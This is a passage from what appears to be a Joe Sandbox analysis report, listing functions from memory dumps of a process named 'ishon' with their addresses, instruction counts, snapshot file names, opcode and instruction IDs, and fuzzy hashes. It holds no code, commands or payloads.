                                                                          • API String ID:
                                                                          • Opcode ID: 649ae356742f6a9968dbceb0d40f62d28cdcf29e4b56ce5da15ba4d13422429e
                                                                          • Instruction ID: c7f7c87d185ccf79b7deeb6babdee655b1136c55c95f62d9d8a32befd6eebb68
                                                                          • Opcode Fuzzy Hash: 649ae356742f6a9968dbceb0d40f62d28cdcf29e4b56ce5da15ba4d13422429e
                                                                          • Instruction Fuzzy Hash: CAF08278E08348AFCB51CFB8D4512ECBFF0AB49214F1090EBD80897352C6355A46EF41
                                                                          Function 074CA898 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65c3ed1d636f27b393c2dda1eb2f3ba871a63bfcabc4adb254c5e4bdef43e533
                                                                          • Instruction ID: 79f4f3f262c7fabb83910deb602031625b944ce4996a98d07c8972a7004712b2
                                                                          • Opcode Fuzzy Hash: 65c3ed1d636f27b393c2dda1eb2f3ba871a63bfcabc4adb254c5e4bdef43e533
                                                                          • Instruction Fuzzy Hash: 9FE0ED7891A288AFC741DFB8D4092E9BFB49B06200F0081ABD88493A42DA305A86DB61
                                                                          Function 074CDD47 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08ebc074097e8f9a56a9cbf59a33c1eee6ff2b3918d6c4a7353e5b33fc364d59
                                                                          • Instruction ID: 1b94de86bc4eaeaabe0911dbf1064393c003d082d3c691bea80dffe596bd39f2
                                                                          • Opcode Fuzzy Hash: 08ebc074097e8f9a56a9cbf59a33c1eee6ff2b3918d6c4a7353e5b33fc364d59
                                                                          • Instruction Fuzzy Hash: 0BE02236A04348EFCB01DF70F8406EDBBB9EF45200F40429AD404CB241DA344F069BA1
                                                                          Function 074CBE58 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b0d029c6beabd08cc9d7ec806e9a97544a3c0227df9b026bc1d733b1a09e459d
                                                                          • Instruction ID: 8dbe86b91dbafeb5e305200446517dbdeb24eb311a1a2a29f91f9cc87324f2d2
                                                                          • Opcode Fuzzy Hash: b0d029c6beabd08cc9d7ec806e9a97544a3c0227df9b026bc1d733b1a09e459d
                                                                          • Instruction Fuzzy Hash: 86F0A0B8A192889FC741DBB8D4422E8BFF09B05201F1080DBD848C7352D6329E45CB92
                                                                          Function 074CD341 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a1483186b6468235d5588f80773fbf37ed9a6281a46c0f1252dbf149ac48d4d
                                                                          • Instruction ID: 23af6524bdcab9324db30e32fa085d2c34c5403cb9cfb32b2a052d9db449b0a6
                                                                          • Opcode Fuzzy Hash: 1a1483186b6468235d5588f80773fbf37ed9a6281a46c0f1252dbf149ac48d4d
                                                                          • Instruction Fuzzy Hash: 0DF0E578908208DFC706CFA4E9414E8BF70FB42310F50C0ABD84457356C6315A56DF91
                                                                          Function 074CDCFF Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e231b9a0ed1c8a8af5420b378df6ab52b7faee819bcca9debf244c132a3887dd
                                                                          • Instruction ID: 3597490c7df3d2c4374849c7957b049d774bad41cae382e62d3399a22a8198a3
                                                                          • Opcode Fuzzy Hash: e231b9a0ed1c8a8af5420b378df6ab52b7faee819bcca9debf244c132a3887dd
                                                                          • Instruction Fuzzy Hash: 8FE09230A0A24CAFCB11DF74E9006EDBBF5FF45220B5007DAD418D3682DA355F4487A1
                                                                          Function 075F6F40 Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8370daa6935a4427aaa418e14cb31d854f049d9b2fb5ef4681c45df8cef00263
                                                                          • Instruction ID: 91fb7ca0d7a78c3e3cf5f07a758b23e48f9babcd6b8aa7a510a2adf8e0c6d034
                                                                          • Opcode Fuzzy Hash: 8370daa6935a4427aaa418e14cb31d854f049d9b2fb5ef4681c45df8cef00263
                                                                          • Instruction Fuzzy Hash: E7E012312442159BC7149A1AF884C4BFB9EEEC0365710C539A10A87225DA74ED09C690
                                                                          Function 074C9A52 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 366cf75b2c66bb8393a9fc2ba437ed52e6a0c6357100042c860637126f32e50f
                                                                          • Instruction ID: 45e615d4a424e1367eecd6cffcbffed07a40c4188ab6f7c2f103b76e9e9c06cf
                                                                          • Opcode Fuzzy Hash: 366cf75b2c66bb8393a9fc2ba437ed52e6a0c6357100042c860637126f32e50f
                                                                          • Instruction Fuzzy Hash: A4F0FFB49046A8CFEB94DF29ED9879A7AB5FB05342F00059AC00D93240C7394E85DF01
                                                                          Function 074CD500 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction ID: 491a1bf61762bf6a7b4c9d2c8334fffe305b305c5066e75fec9688f0de099d30
                                                                          • Opcode Fuzzy Hash: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction Fuzzy Hash: 6CE01AB8E04208EFCB84DFA8D5416ADFBF4EB48304F10C0AED818A3341D632AA06DF40
                                                                          Function 074CC4A0 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction ID: 955b27e14676167293f84dccc50a99d5b1fb89aa72af3340981a7c9bee7ae006
                                                                          • Opcode Fuzzy Hash: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction Fuzzy Hash: 21E0E5B8E04208EFCB84DFA8D5816ACBBF5EB48300F10C5AE981CA7341D635AA02DF44
                                                                          Function 074C0B2A Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1eab6defce6e153c5430557be8c901cf19ccc7f864016c98f5565e6004aed194
                                                                          • Instruction ID: 2479d970bd8103cf7351552f9e9ed2b86544d264be9d8b0e8dad5ad343cc6ad3
                                                                          • Opcode Fuzzy Hash: 1eab6defce6e153c5430557be8c901cf19ccc7f864016c98f5565e6004aed194
                                                                          • Instruction Fuzzy Hash: A5E026B1484108DFC700DFF8C5002ED3BE9EB84200F4045ABD00893560DA304A11EB92
                                                                          Function 074CBE68 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a40ad2d00a525c287a63bb3b27d10663d6769e812f0344948a0f4c35ccc62c8a
                                                                          • Instruction ID: 1f48329aa07eeb05aff86fbfe1e6af71262d9d7e3d34a9dcd755ba108f004854
                                                                          • Opcode Fuzzy Hash: a40ad2d00a525c287a63bb3b27d10663d6769e812f0344948a0f4c35ccc62c8a
                                                                          • Instruction Fuzzy Hash: 62E086B4914108DFC780DFACC54169CBBF4EB08204F1080AED808D3341D7329E41CB41
                                                                          Function 074CDDBC Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3efdc3e6139ef70d1885473a9f4839d7443bc237e11e4f89f0e29edd4cc63e47
                                                                          • Instruction ID: c866e94c73aa4be5ffb927f03a0ca6df6326f17b5cd84913aca745e07a266e04
                                                                          • Opcode Fuzzy Hash: 3efdc3e6139ef70d1885473a9f4839d7443bc237e11e4f89f0e29edd4cc63e47
                                                                          • Instruction Fuzzy Hash: BEE0C2E6E090855BD716C76868515E13B64CD6324074542DFE4488B52DE2188A17DB50
                                                                          Function 074C0B30 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3dfc9a23c44ab0019b3cae7e62bfd37af19ab90c19f8c7f26d1eec2616030abd
                                                                          • Instruction ID: 2e0e1e70e0a925502e0668cda7686fcd32c55af8668292ae52c8c2d64cbf8938
                                                                          • Opcode Fuzzy Hash: 3dfc9a23c44ab0019b3cae7e62bfd37af19ab90c19f8c7f26d1eec2616030abd
                                                                          • Instruction Fuzzy Hash: 86E012F145120CEFC701EFF9C9016DE7BEDEB49211F4045ABD50493610EE755A14EB52
                                                                          Function 074CA8A8 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0efdaa779e759e5009a87c14ca16cf37df1cde90e245f7a20b21d6765796c78
                                                                          • Instruction ID: ce6bbbeb3069b041cc80f37b0c4c3e073ec96e250d1018aed919a4fc92b08efb
                                                                          • Opcode Fuzzy Hash: a0efdaa779e759e5009a87c14ca16cf37df1cde90e245f7a20b21d6765796c78
                                                                          • Instruction Fuzzy Hash: 78E0ECB4E1624CDFCB80EFA8D54969DBBB8AB05205F1080AA9808A3341EB305A55DF51
                                                                          Function 074CDD58 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa561783661d0029a76123bd969a2f546d8275a329a50ac91bd853bf0cfde778
                                                                          • Instruction ID: 32ce1804a54f67c23ec624ef5a78b76a2476710a65b392d04ae316696281584b
                                                                          • Opcode Fuzzy Hash: aa561783661d0029a76123bd969a2f546d8275a329a50ac91bd853bf0cfde778
                                                                          • Instruction Fuzzy Hash: 8EE01270A40209EFDB04DFB5E941AADB7FAEF84200F5085A9D504D7244DA355E049B90
                                                                          Function 074CDD10 Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a56696071f2c0fcef028799bb0cef4e73638e4e43ec77207b28dffed13a788a
                                                                          • Instruction ID: fc7609e42810d1a8518b4b2fae96ea41b301ecc15333c4f0d935457c4226ce10
                                                                          • Opcode Fuzzy Hash: 3a56696071f2c0fcef028799bb0cef4e73638e4e43ec77207b28dffed13a788a
                                                                          • Instruction Fuzzy Hash: 09E01270A0110CEFCB00DFB4E5006EE77F9FB45200F5045A9D408D3740DA766E449B91
                                                                          Function 074CB742 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c87ac19c18c8b213f99618bb2f65783163ad7086fd63a3af5cdf58df65c3842
                                                                          • Instruction ID: cf4b2a40c58e7595adb6a982cebb7894f19592c4b2960e6b73d3c83634eb3a38
                                                                          • Opcode Fuzzy Hash: 1c87ac19c18c8b213f99618bb2f65783163ad7086fd63a3af5cdf58df65c3842
                                                                          • Instruction Fuzzy Hash: 44E0E574904264CBD790EF50D8947ADBBB1FB49301F50849A944EA3340CE341DC98F00
                                                                          Function 074CB798 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 359fbdbc23323be8c74df2cbababf99fe3c54851e8b9e98a7a4730e369066b9b
                                                                          • Instruction ID: b69fa6af156df9828eabb79669ab731ebdd7a71ae9b9ae41cc81e3372c8a325f
                                                                          • Opcode Fuzzy Hash: 359fbdbc23323be8c74df2cbababf99fe3c54851e8b9e98a7a4730e369066b9b
                                                                          • Instruction Fuzzy Hash: BEE01AB49042158FD7A4EF64D8847ECBBB2FB56301F40409A8589A3351CF341DC5CF41
                                                                          Function 074CB6EC Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a1d1632a128848179aef42ae121e8c99cb49ca333cd65830b77e606cd84fec5
                                                                          • Instruction ID: b67215d414db2fdf94e26c5a59166d9c2173523dc59e7d100106809514c9a68c
                                                                          • Opcode Fuzzy Hash: 7a1d1632a128848179aef42ae121e8c99cb49ca333cd65830b77e606cd84fec5
                                                                          • Instruction Fuzzy Hash: 9AE04F7491111ADFDB20EF60D9947ADBBB1FB49301F4181EA840E63741DB345D84CF91
                                                                          Function 074CB560 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 39d5f1a7d91ea43bcd1a73f7ff1ddfd805ad515c921a89736a63cf2187512bad
                                                                          • Instruction ID: b3d5e5341e6dbd45ec9df277a129e170a2890efda12945b32dd3ee64f3149c31
                                                                          • Opcode Fuzzy Hash: 39d5f1a7d91ea43bcd1a73f7ff1ddfd805ad515c921a89736a63cf2187512bad
                                                                          • Instruction Fuzzy Hash: F4E01AB4901155CFD714DF60DA897EDBBB1FB45301F40949A860A73240CA345D80CF01
                                                                          Function 074CB329 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20e4aeea7c68314969465f4a1af7bb4f44fac6aa9081ea5e91c06ac9566ab587
                                                                          • Instruction ID: 88fbee03c4c1657f781b306bfa0831b83647685ba2661a382488f2812ea26c52
                                                                          • Opcode Fuzzy Hash: 20e4aeea7c68314969465f4a1af7bb4f44fac6aa9081ea5e91c06ac9566ab587
                                                                          • Instruction Fuzzy Hash: 4DE04F74900254CFEB10DF54D998BADBBF6FB4A341F509899D04A73341CA391D89CF20
                                                                          Function 074CBBA3 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24a68972d5c2322a0a59da904b6f9fd5a157aadc066c2852e96d9b98803eeea6
                                                                          • Instruction ID: 27be710968c1e08f0b65bd537e75834f7b1ffa51ed44778ecc81a858d1322227
                                                                          • Opcode Fuzzy Hash: 24a68972d5c2322a0a59da904b6f9fd5a157aadc066c2852e96d9b98803eeea6
                                                                          • Instruction Fuzzy Hash: FEE0E5B8A182589FD790DFA4D8887EDBBB1FF46301F904199948AA7344CE301DC9CF01
                                                                          Function 074CB236 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 580849d46f8525e94dbd0d363c6fba9a5b7c64960b44cb2822510cc6cf65264e
                                                                          • Instruction ID: 705dcf0b66c98e9be19963fc22f96b4ebba326ef8c989f8671aff1f886e376fd
                                                                          • Opcode Fuzzy Hash: 580849d46f8525e94dbd0d363c6fba9a5b7c64960b44cb2822510cc6cf65264e
                                                                          • Instruction Fuzzy Hash: ABE01AB4910259CFE718DFA5D895BEDBBB2FB46341F90809B994973280CB341D85CF60
                                                                          Function 074CB2D3 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 41708fab08c597c90ca86a5f53a2af4a540d2a2ae3438158b1c68f48d26c4ddc
                                                                          • Instruction ID: 534373d499e4125d399749d50ff3e58d59a903a881463bde7abc07b650dc0215
                                                                          • Opcode Fuzzy Hash: 41708fab08c597c90ca86a5f53a2af4a540d2a2ae3438158b1c68f48d26c4ddc
                                                                          • Instruction Fuzzy Hash: A2E09AB491020ACFC724DF60D8947BD7BB1FB49301F0001A8960963680DB380D80CF00
                                                                          Function 074CB9B6 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5b8213d8cfb74a8db0b18417071ccd7e2ff2744a1dba901cce5136377ef9f31
                                                                          • Instruction ID: 8990d9651dd16dd185655544a48c9572313edd2610b408aa6dd840dfee295de4
                                                                          • Opcode Fuzzy Hash: e5b8213d8cfb74a8db0b18417071ccd7e2ff2744a1dba901cce5136377ef9f31
                                                                          • Instruction Fuzzy Hash: B6E04FF4A01218CBD714EF60D9956EEB7B1FB59741F404199CA4A63340CB745D84CF10
                                                                          Function 074CB8D7 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b4099dc5fc8f33017fb5169a68f55bfbdce23e31b55de7d8be6fe6c0a02d0e8
                                                                          • Instruction ID: 44ef5e4f18fdb0da3807f92791d6e6e32a453fd6e31ae261eb7268cf663e3ef8
                                                                          • Opcode Fuzzy Hash: 3b4099dc5fc8f33017fb5169a68f55bfbdce23e31b55de7d8be6fe6c0a02d0e8
                                                                          • Instruction Fuzzy Hash: 18E01AB8A00259CFE750EF61E888BADBBB1FB86302F5180998589A7340DB341D85CF11
                                                                          Function 074C401F Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa67fd85e1fd8efed5774f11bf31e2ecb6a2d56b94edf1296ae31c1ab2a59588
                                                                          • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                                          • Opcode Fuzzy Hash: aa67fd85e1fd8efed5774f11bf31e2ecb6a2d56b94edf1296ae31c1ab2a59588
                                                                          • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                                          Function 075FEF60 Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ebb426b25cdad3d233a6f49d75dd49b0ab091da5cfbe31ff61cdf522b7530ad4
                                                                          • Instruction ID: 94b3c31178116a19f55e73cde8cf462fbd88c4fc07e9bb7da412905707873dd0
                                                                          • Opcode Fuzzy Hash: ebb426b25cdad3d233a6f49d75dd49b0ab091da5cfbe31ff61cdf522b7530ad4
                                                                          • Instruction Fuzzy Hash: 90B09236040208ABC70A9A84E814865BBADAB58744B048026F609061128B32A822DBD8